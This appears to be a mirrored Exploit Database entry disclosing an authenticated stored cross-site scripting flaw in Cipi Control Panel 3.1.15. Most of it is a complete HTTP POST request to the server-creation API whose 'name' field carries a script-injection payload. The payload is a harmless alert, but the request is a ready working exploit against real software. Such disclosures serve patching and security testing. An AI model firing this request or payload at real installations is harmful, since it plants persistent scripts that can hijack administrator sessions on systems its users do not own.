Cipi Control Panel 3.1.15 – Stored Cross-Site Scripting (XSS) (Authenticated)

• Exploit Database
• 43 阅读

• 作者： Ghuliev
  日期： 2022-02-28
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/50788/

• # Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
  # Date: 24.02.2022
  # Exploit Author: Fikrat Ghuliev (Ghuliev)
  # Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
  # Software Link: https://cipi.sh/ <https://www.aapanel.com/>
  # Version: 3.1.15
  # Tested on: Ubuntu
  
  When the user wants to add a new server on the "Server" panel, in "name"
  parameter has not had any filtration.
  
  POST /api/servers HTTP/1.1
  Host: IP
  Content-Length: 102
  Accept: application/json
  X-Requested-With: XMLHttpRequest
  Authorization: Bearer
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
  (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
  Content-Type: application/json
  Origin: http://IP
  Referer: http://IP/servers
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Connection: close
  
  {
  "name":"\"><script>alert(1337)</script>",
  "ip":"10.10.10.10",
  "provider":"local",
  "location":"xss test"
  }